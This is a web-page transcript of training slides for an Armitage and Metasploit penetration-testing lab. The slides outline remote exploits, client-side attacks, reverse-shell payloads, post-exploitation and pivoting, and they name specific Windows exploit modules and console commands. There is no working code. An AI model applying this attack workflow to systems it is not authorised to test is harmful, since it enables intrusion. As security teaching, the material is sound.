Armitage and Metasploit Penetration Testing Lab

Slides:



Advertisements
Similar presentations
By Bruce Ellis Western Governors University. Demonstrate the need for updating information systems Build security awareness Inform management of the risk.
Advertisements

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail.
A C ONCEPT OF O PERATIONS. Raphael Mudge, Strategic Cyber LLC – I develop Cobalt Strike – Would.
Client and Server-Side Vulnerabilities Stephen Reese.
Offense in Depth A Developer’s Perspective on Hacker Tradecraft.
Module 6: Configuring Windows XP Professional to Operate in a Microsoft Network.
Offensive Security Part 1 Basics of Penetration Testing
Abusing Windows Remote Management with Metasploit David Maloney Metasploit Software Engineer Rapid7.
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
© 2010 – MAD Security, LLC All rights reserved ArmitageArmitage A Power User’s Interface for Metasploit.
Vulnerability Analysis Borrowed from the CLICS group.
Metasploit – Embedded PDF Exploit Presented by: Jesse Lucas.
Vulnerability Testing Approach Prepared By: Phil Cheese Nov 2008.
Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.
Computer Security and Penetration Testing
MIS Week 3 Site:
Browser Exploitation Framework (BeEF) Lab
BackTrack Penetration Testing Workshop Michael Holcomb, CISSP Upstate ISSA Chapter.
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
Introduction to InfoSec – Recitation 15 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Module 4: Add Client Computers and Devices to the Network.
Pen testing to ensure your security
Module 14: Configuring Server Security Compliance
1 Vulnerability Analysis and Patches Management Using Secure Mobile Agents Presented by: Muhammad Awais Shibli.
INSTALLATION HANDS-ON. Page 2 About the Hands-On This hands-on section is structured in a way, that it allows you to work independently, but still giving.
Penetration Testing Training Day Penetration Testing Tools and Techniques – pt 1 Mike Westmacott, IRM plc Supported by.
MIS Week 1 Site:
Remote Administration Remote Desktop Remote Desktop Gateway Remote Assistance Windows Remote Management Service Remote Server Administration Tools.
Module 6: Integrating ISA Server 2004 and Microsoft Exchange Server.
1 Figure 4-1: Targeted System Penetration (Break-In Attacks) Host Scanning  Ping often is blocked by firewalls  Send TCP SYN/ACK to generate RST segments.
Module 6: Managing Client Access. Overview Implementing Client Access Servers Implementing Client Access Features Implementing Outlook Web Access Introduction.
Module 14: Securing Windows Server Overview Introduction to Securing Servers Implementing Core Server Security Hardening Servers Microsoft Baseline.
© 2010 – MAD Security, LLC All rights reserved Team Operations Collaborate with Armitage and Metasploit.
Penetration Testing 101 (Boot-camp)
Vulnerability Scanning Vulnerability scanners are automated tools that scan hosts and networks for known vulnerabilities and weaknesses Credentialed vs.
CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation.
Module 1A An Introduction to Metasploit – Based upon Chapter 2 of “Metasploit the Penetration testers guide” Based upon Chapter 2 of “Metasploit the Penetration.
The Front Range’s Largest AppSec Conference is BACK February 18, 2016 Details & registration at Keynote by Jeremiah Grossman.
JMU GenCyber Boot Camp Summer, “Canned” Exploits For many known vulnerabilities attackers do not have to write their own exploit code Many repositories.
Alison Buben Jay Pataky COSC 316.  Main purpose: Penetration Testing ◦ Evaluating the security of a computer by simulating an attack ◦ Showing where.
Penetration Testing with METASPLOIT Am Chaitanya Krishna. A.
PostExploitation CIS 5930/4930 Offensive Computer Security Spring 2014.
Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Tim Wostradowski, Ian Brophy, John Ang.  Project Conception  Developing the Idea  Refining the Method  Gathering the Data  From Data to Information.
Penetration Testing Exploiting 2: Compromising Target by Metasploit tool CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
Intro to Ethical Hacking
Metasploit Framework (MSF) Fundamentals
Penetration Testing: Concepts,Attacks and Defence Stratagies
Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
PART 1 – FILE UPLOAD BACKDOORS: METASPLOIT
Chris D Hicks Director of IT MCSE, MCP + Internet Security
Network Exploitation Tool
Metasploit a one-stop hack shop
Module 22 (Metasploit Introduction)
CIT 480: Securing Computer Systems
Module 36 (Expanding Your Control of Windows Victims)
Metasploit Project For this exploit I will be using the following strategy Create backdoor exe file Upload file to website Have victim computer download.
Intro to Ethical Hacking
Real GPEN GIAC Information Security Study Guide Killtest
PT0-001 Dumps PDF CompTIA PenTest+ Exam Exam Code Exam Name.
Mobile Pen Testing w/ drozer
Week 5.
Backtrack Metasploit and SET
Web Application Penetration Testing ‘17
Metasploit Analysis Report Overview
Cyber Operation and Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack Cliff Zou University of Central Florida.
Penetration Testing & Network Defense
Metasploit a short tutorial
Presentation transcript:

Armitage and Metasploit Penetration Testing Lab Raphael Mudge rsmudge@gmail.com Twitter: @armitagehacker

Armitage and Metasploit Penetration Testing Lab

Overview Personal Introduction Penetration Testing Process Course Overview

Introduction – R. Mudge Previous Experiences Other Experiences Penetration Tester Regional CCDC Red Team x 5 USAF Security Researcher Armitage for Metasploit Other Experiences WordPress Grammar Checker Programming Language

What? Test security by doing what bad guys might do Penetration Testing What? Test security by doing what bad guys might do

Why? Motivate desire to make changes to improve security Penetration Testing Why? Motivate desire to make changes to improve security

Penetration Testing How? Demonstrate risk

Types of Penetration Tests Open Source Research Network Social Engineering Wireless Web Applications Mobile

Penetration Testing Process Information Gathering Reconnaissance Access Post-Exploitation

Network Attack Process

Motivation

Motivation

Course overview Penetration Testing Metasploit Getting Access Post Exploitation Maneuver

Goals Install Metasploit Get Access to Hosts Post-exploitation

Who is Raphael Mudge? Why Penetration Test? What are we doing today? Learning Check Who is Raphael Mudge? Why Penetration Test? What are we doing today?

Armitage and Metasploit Penetration Testing Lab

Overview What is Metasploit? Modules Metasploit Console Armitage

What is Metasploit?

What is Metasploit? Metasploit Linux Modules Programs msfconsole /bin/bash RPC Daemon sshd

Modules

Modules

Modules and Magic the Gathering Examples: 1) Use auxiliary module to enumerate SMB and find out domain info; Use hashdump post module to gather credentials; Use psexec module to get code execution 2) Use snmp module to brute force community string; Use cisco_download_config to download router config file © 1995-2011 Wizards of the Coast

Module Organization

Metasploit Command Sets Metasploit Console Manage Database Manage Sessions Configure and Launch Modules Meterpreter Post-exploitation activities

Console Cheat Sheet use module - start configuring module show options - show configurable options set varname value - set option exploit - launch exploit module run - launch non-exploit sessions –i n - interact with a session help command - get help for a command

msfconsole Open ended Works in many places One task / host at a time

What is Armitage? A GUI for Metasploit Goal: Avoid this…

Armitage

Armitage Sightings…

Console Demo

What is a session? What is a payload? What do exploits do? Learning Check What is a session? What is a payload? What do exploits do?

Armitage and Metasploit Penetration Testing Lab Getting Access

Overview Remote Exploits Exploit-free Attack Client-side Exploits

Network Attack Process

Remote Attack NMap Scan Analyze Scan Data Choose an Exploit Select a Payload Launch Exploit!

Which exploit do I use? Answer: These. Name Where ms08_067_netapi Windows XP/2003 era ms09_050_smb2_negot.. Windows Vista SP1/SP2 ms03_026_dcom Windows 2000

Why did my exploit fail? Firewall Non-vulnerable software Service is hung The universe is taunting you Non-reliable exploit Bad day Mis-configured exploit Could not establish session

Exploit-free Attack Choose a payload Generate executable Set up a multi/handler

Payloads Name Note windows/meterpreter/reverse_tcp Connects to one port windows/meterpreter/reverse_tcp_allports Tries every ports in sequence windows/meterpreter/reverse_https Speaks HTTPS (!!!!) java/meterpreter/reverse_tcp Any platform with Java linux/x86//shell_reverse_tcp osx/x86/shell_reverse_tcp

Client-side Attack Fingerprint sample of victims Choose an Exploit Launch Expoit Spam victims (or wait for them)!

Which exploit do I use? Answer: These. Name Where java_signed_applet Social engineering; any where Java applets run ms11_003_ie_css_import Internet Explorer 7/8 (requires .NET) ie_createobject Internet Explorer 6

Which module listens for a connection from a payload? Learning Check Which module listens for a connection from a payload? Which exploit works against Windows XP SP2, port 445?

Armitage and Metasploit Penetration Testing Lab Post-Exploitation

Overview Command Shell Privilege Escalation Spying on the User File Management Process Management Post Modules and Loot

Network Attack Process

Demo Demo Demo

Learning Check Which Meterpreter command takes a screenshot? Which Meterpreter command is most useful to you?

Armitage and Metasploit Penetration Testing Lab Maneuver

Overview Pivoting Scanning Attacking

Network Attack Process

Demo Demo Demo

Learning Check Which module gives a session on a Windows host using credentials or hashes? Which scan should you do before setting up a pivot?

Network Attack Process

Armitage and Metasploit Penetration Testing Lab Resources

Free Metasploit Course http://www.offensive-security.com/metasploit-unleashed

Metasploit Homepage http://www.metasploit.com

Armitage Homepage http://www.fastandeasyhacking.com

BackTrack Linux http://www.backtrack-linux.org/

Pen Test & Vuln Analysis Course @ NYU http://pentest.cryptocity.net

Armitage and Metasploit Penetration Testing Lab Raphael Mudge rsmudge@gmail.com Twitter: @armitagehacker

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com. Inc. All rights reserved.